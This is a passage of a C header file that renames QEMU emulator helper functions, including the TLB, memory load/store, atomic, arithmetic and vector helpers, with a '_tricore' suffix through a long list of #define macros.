tlb_set_page_with_attrs tlb_set_page_with_attrs_tricore #define tlb_set_page tlb_set_page_tricore #define get_page_addr_code_hostp get_page_addr_code_hostp_tricore #define get_page_addr_code get_page_addr_code_tricore #define probe_access probe_access_tricore #define tlb_vaddr_to_host tlb_vaddr_to_host_tricore #define helper_ret_ldub_mmu helper_ret_ldub_mmu_tricore #define helper_le_lduw_mmu helper_le_lduw_mmu_tricore #define helper_be_lduw_mmu helper_be_lduw_mmu_tricore #define helper_le_ldul_mmu helper_le_ldul_mmu_tricore #define helper_be_ldul_mmu helper_be_ldul_mmu_tricore #define helper_le_ldq_mmu helper_le_ldq_mmu_tricore #define helper_be_ldq_mmu helper_be_ldq_mmu_tricore #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_tricore #define helper_le_ldsw_mmu helper_le_ldsw_mmu_tricore #define helper_be_ldsw_mmu helper_be_ldsw_mmu_tricore #define helper_le_ldsl_mmu helper_le_ldsl_mmu_tricore #define helper_be_ldsl_mmu helper_be_ldsl_mmu_tricore #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_tricore #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_tricore #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_tricore #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_tricore #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_tricore #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_tricore #define cpu_ldub_data_ra cpu_ldub_data_ra_tricore #define cpu_ldsb_data_ra cpu_ldsb_data_ra_tricore #define cpu_lduw_data_ra cpu_lduw_data_ra_tricore #define cpu_ldsw_data_ra cpu_ldsw_data_ra_tricore #define cpu_ldl_data_ra cpu_ldl_data_ra_tricore #define cpu_ldq_data_ra cpu_ldq_data_ra_tricore #define cpu_ldub_data cpu_ldub_data_tricore #define cpu_ldsb_data cpu_ldsb_data_tricore #define cpu_lduw_data cpu_lduw_data_tricore #define cpu_ldsw_data cpu_ldsw_data_tricore #define cpu_ldl_data cpu_ldl_data_tricore #define cpu_ldq_data cpu_ldq_data_tricore #define helper_ret_stb_mmu helper_ret_stb_mmu_tricore #define helper_le_stw_mmu helper_le_stw_mmu_tricore #define helper_be_stw_mmu helper_be_stw_mmu_tricore #define helper_le_stl_mmu helper_le_stl_mmu_tricore #define helper_be_stl_mmu helper_be_stl_mmu_tricore #define helper_le_stq_mmu helper_le_stq_mmu_tricore #define helper_be_stq_mmu helper_be_stq_mmu_tricore #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_tricore #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_tricore #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_tricore #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_tricore #define cpu_stb_data_ra cpu_stb_data_ra_tricore #define cpu_stw_data_ra cpu_stw_data_ra_tricore #define cpu_stl_data_ra cpu_stl_data_ra_tricore #define cpu_stq_data_ra cpu_stq_data_ra_tricore #define cpu_stb_data cpu_stb_data_tricore #define cpu_stw_data cpu_stw_data_tricore #define cpu_stl_data cpu_stl_data_tricore #define cpu_stq_data cpu_stq_data_tricore #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_tricore #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_tricore #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_tricore #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_tricore #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_tricore #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_tricore #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_tricore #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_tricore #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_tricore #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_tricore #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_tricore #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_tricore #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_tricore #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_tricore #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_tricore #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_tricore #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_tricore #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_tricore #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_tricore #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_tricore #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_tricore #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_tricore #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_tricore #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_tricore #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_tricore #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_tricore #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_tricore #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_tricore #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_tricore #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_tricore #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_tricore #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_tricore #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_tricore #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_tricore #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_tricore #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_tricore #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_tricore #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_tricore #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_tricore #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_tricore #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_tricore #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_tricore #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_tricore #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_tricore #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_tricore #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_tricore #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_tricore #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_tricore #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_tricore #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_tricore #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_tricore #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_tricore #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_tricore #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_tricore #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_tricore #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_tricore #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_tricore #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_tricore #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_tricore #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_tricore #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_tricore #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_tricore #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_tricore #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_tricore #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_tricore #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_tricore #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_tricore #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_tricore #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_tricore #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_tricore #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_tricore #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_tricore #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_tricore #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_tricore #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_tricore #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_tricore #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_tricore #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_tricore #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_tricore #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_tricore #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_tricore #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_tricore #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_tricore #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_tricore #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_tricore #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_tricore #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_tricore #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_tricore #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_tricore #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_tricore #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_tricore #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_tricore #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_tricore #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_tricore #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_tricore #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_tricore #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_tricore #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_tricore #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_tricore #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_tricore #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_tricore #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_tricore #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_tricore #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_tricore #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_tricore #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_tricore #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_tricore #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_tricore #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_tricore #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_tricore #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_tricore #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_tricore #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_tricore #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_tricore #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_tricore #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_tricore #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_tricore #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_tricore #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_tricore #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_tricore #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_tricore #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_tricore #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_tricore #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_tricore #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_tricore #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_tricore #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_tricore #define helper_atomic_xchgb helper_atomic_xchgb_tricore #define helper_atomic_fetch_addb helper_atomic_fetch_addb_tricore #define helper_atomic_fetch_andb helper_atomic_fetch_andb_tricore #define helper_atomic_fetch_orb helper_atomic_fetch_orb_tricore #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_tricore #define helper_atomic_add_fetchb helper_atomic_add_fetchb_tricore #define helper_atomic_and_fetchb helper_atomic_and_fetchb_tricore #define helper_atomic_or_fetchb helper_atomic_or_fetchb_tricore #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_tricore #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_tricore #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_tricore #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_tricore #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_tricore #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_tricore #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_tricore #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_tricore #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_tricore #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_tricore #define helper_atomic_xchgw_le helper_atomic_xchgw_le_tricore #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_tricore #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_tricore #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_tricore #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_tricore #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_tricore #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_tricore #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_tricore #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_tricore #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_tricore #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_tricore #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_tricore #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_tricore #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_tricore #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_tricore #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_tricore #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_tricore #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_tricore #define helper_atomic_xchgw_be helper_atomic_xchgw_be_tricore #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_tricore #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_tricore #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_tricore #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_tricore #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_tricore #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_tricore #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_tricore #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_tricore #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_tricore #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_tricore #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_tricore #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_tricore #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_tricore #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_tricore #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_tricore #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_tricore #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_tricore #define helper_atomic_xchgl_le helper_atomic_xchgl_le_tricore #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_tricore #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_tricore #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_tricore #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_tricore #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_tricore #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_tricore #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_tricore #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_tricore #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_tricore #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_tricore #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_tricore #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_tricore #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_tricore #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_tricore #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_tricore #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_tricore #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_tricore #define helper_atomic_xchgl_be helper_atomic_xchgl_be_tricore #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_tricore #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_tricore #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_tricore #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_tricore #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_tricore #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_tricore #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_tricore #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_tricore #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_tricore #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_tricore #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_tricore #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_tricore #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_tricore #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_tricore #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_tricore #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_tricore #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_tricore #define helper_atomic_xchgq_le helper_atomic_xchgq_le_tricore #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_tricore #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_tricore #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_tricore #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_tricore #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_tricore #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_tricore #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_tricore #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_tricore #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_tricore #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_tricore #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_tricore #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_tricore #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_tricore #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_tricore #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_tricore #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_tricore #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_tricore #define helper_atomic_xchgq_be helper_atomic_xchgq_be_tricore #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_tricore #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_tricore #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_tricore #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_tricore #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_tricore #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_tricore #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_tricore #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_tricore #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_tricore #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_tricore #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_tricore #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_tricore #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_tricore #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_tricore #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_tricore #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_tricore #define cpu_ldub_code cpu_ldub_code_tricore #define cpu_lduw_code cpu_lduw_code_tricore #define cpu_ldl_code cpu_ldl_code_tricore #define cpu_ldq_code cpu_ldq_code_tricore #define helper_div_i32 helper_div_i32_tricore #define helper_rem_i32 helper_rem_i32_tricore #define helper_divu_i32 helper_divu_i32_tricore #define helper_remu_i32 helper_remu_i32_tricore #define helper_shl_i64 helper_shl_i64_tricore #define helper_shr_i64 helper_shr_i64_tricore #define helper_sar_i64 helper_sar_i64_tricore #define helper_div_i64 helper_div_i64_tricore #define helper_rem_i64 helper_rem_i64_tricore #define helper_divu_i64 helper_divu_i64_tricore #define helper_remu_i64 helper_remu_i64_tricore #define helper_muluh_i64 helper_muluh_i64_tricore #define helper_mulsh_i64 helper_mulsh_i64_tricore #define helper_clz_i32 helper_clz_i32_tricore #define helper_ctz_i32 helper_ctz_i32_tricore #define helper_clz_i64 helper_clz_i64_tricore #define helper_ctz_i64 helper_ctz_i64_tricore #define helper_clrsb_i32 helper_clrsb_i32_tricore #define helper_clrsb_i64 helper_clrsb_i64_tricore #define helper_ctpop_i32 helper_ctpop_i32_tricore #define helper_ctpop_i64 helper_ctpop_i64_tricore #define helper_lookup_tb_ptr helper_lookup_tb_ptr_tricore #define helper_exit_atomic helper_exit_atomic_tricore #define helper_gvec_add8 helper_gvec_add8_tricore #define helper_gvec_add16 helper_gvec_add16_tricore #define helper_gvec_add32 helper_gvec_add32_tricore #define helper_gvec_add64 helper_gvec_add64_tricore #define helper_gvec_adds8 helper_gvec_adds8_tricore #define helper_gvec_adds16 helper_gvec_adds16_tricore #define helper_gvec_adds32 helper_gvec_adds32_tricore #define helper_gvec_adds64 helper_gvec_adds64_tricore #define helper_gvec_sub8 helper_gvec_sub8_tricore #define helper_gvec_sub16 helper_gvec_sub16_tricore #define helper_gvec_sub32 helper_gvec_sub32_tricore #define helper_gvec_sub64 helper_gvec_sub64_tricore #define helper_gvec_subs8 helper_gvec_subs8_tricore #define helper_gvec_subs16 helper_gvec_subs16_tricore #define helper_gvec_subs32 helper_gvec_subs32_tricore #define helper_gvec_subs64 helper_gvec_subs64_tricore #define helper_gvec_mul8 helper_gvec_mul8_tricore #define helper_gvec_mul16 helper_gvec_mul16_tricore #define helper_gvec_mul32 helper_gvec_mul32_tricore #define helper_gvec_mul64 helper_gvec_mul64_tricore #define helper_gvec_muls8 helper_gvec_muls8_tricore #define helper_gvec_muls16 helper_gvec_muls16_tricore #define helper_gvec_muls32 helper_gvec_muls32_tricore #define helper_gvec_muls64 helper_gvec_muls64_tricore #define helper_gvec_neg8 helper_gvec_neg8_tricore #define helper_gvec_neg16 helper_gvec_neg16_tricore #define helper_gvec_neg32 helper_gvec_neg32_tricore #define helper_gvec_neg64 helper_gvec_neg64_tricore #define helper_gvec_abs8 helper_gvec_abs8_tricore #define helper_gvec_abs16 helper_gvec_abs16_tricore #define helper_gvec_abs32 helper_gvec_abs32_tricore #define helper_gvec_abs64 helper_gvec_abs64_tricore #define helper_gvec_mov helper_gvec_mov_tricore #define helper_gvec_dup64 helper_gvec_dup64_tricore #define helper_gvec_dup32 helper_gvec_dup32_tricore #define helper_gvec_dup16 helper_gvec_dup16_tricore #define helper_gvec_dup8 helper_gvec_dup8_tricore #define helper_gvec_not helper_gvec_not_tricore #define helper_gvec_and helper_gvec_and_tricore #define helper_gvec_or helper_gvec_or_tricore #define helper_gvec_xor helper_gvec_xor_tricore #define helper_gvec_andc helper_gvec_andc_tricore #define helper_gvec_orc helper_gvec_orc_tricore #define helper_gvec_nand helper_gvec_nand_tricore #define helper_gvec_nor helper_gvec_nor_tricore #define helper_gvec_eqv helper_gvec_eqv_tricore #define helper_gvec_ands helper_gvec_ands_tricore #define helper_gvec_xors helper_gvec_xors_tricore #define helper_gvec_ors helper_gvec_ors_tricore #define helper_gvec_shl8i helper_gvec_shl8i_tricore #define helper_gvec_shl16i helper_gvec_shl16i_tricore #define helper_gvec_shl32i helper_gvec_shl32i_tricore #define helper_gvec_shl64i helper_gvec_shl64i_tricore #define helper_gvec_shr8i helper_gvec_shr8i_tricore #define helper_gvec_shr16i helper_gvec_shr16i_tricore #define helper_gvec_shr32i helper_gvec_shr32i_tricore #define helper_gvec_shr64i helper_gvec_shr64i_tricore #define helper_gvec_sar8i helper_gvec_sar8i_tricore #define helper_gvec_sar16i helper_gvec_sar16i_tricore #define helper_gvec_sar32i helper_gvec_sar32i_tricore #define helper_gvec_sar64i helper_gvec_sar64i_tricore #define helper_gvec_shl8v helper_gvec_shl8v_tricore #define helper_gvec_shl16v helper_gvec_shl16v_tricore #define helper_gvec_shl32v helper_gvec_shl32v_tricore #define helper_gvec_shl64v helper_gvec_shl64v_tricore #define helper_gvec_shr8v helper_gvec_shr8v_tricore #define helper_gvec_shr16v helper_gvec_shr16v_tricore #define helper_gvec_shr32v helper_gvec_shr32v_tricore #define helper_gvec_shr64v helper_gvec_shr64v_tricore #define helper_gvec_sar8v helper_gvec_sar8v_tricore #define helper_gvec_sar16v helper_gvec_sar16v_tricore #define helper_gvec_sar32v helper_gvec_sar32v_tricore #define helper_gvec_sar64v helper_gvec_sar64v_tricore #define helper_gvec_eq8 helper_gvec_eq8_tricore #define helper_gvec_ne8 helper_gvec_ne8_tricore #define helper_gvec_lt8 helper_gvec_lt8_tricore #define helper_gvec_le8 helper_gvec_le8_tricore #define helper_gvec_ltu8 helper_gvec_ltu8_tricore #define helper_gvec_leu8 helper_gvec_leu8_tricore #define helper_gvec_eq16 helper_gvec_eq16_tricore #define helper_gvec_ne16 helper_gvec_ne16_tricore #define helper_gvec_lt16 helper_gvec_lt16_tricore #define helper_gvec_le16 helper_gvec_le16_tricore #define helper_gvec_ltu16 helper_gvec_ltu16_tricore #define helper_gvec_leu16 helper_gvec_leu16_tricore #define helper_gvec_eq32 helper_gvec_eq32_tricore #define helper_gvec_ne32 helper_gvec_ne32_tricore #define helper_gvec_lt32 helper_gvec_lt32_tricore #define helper_gvec_le32 helper_gvec_le32_tricore #define helper_gvec_ltu32 helper_gvec_ltu32_tricore #define helper_gvec_leu32 helper_gvec_leu32_tricore #define helper_gvec_eq64 helper_gvec_eq64_tricore #define helper_gvec_ne64 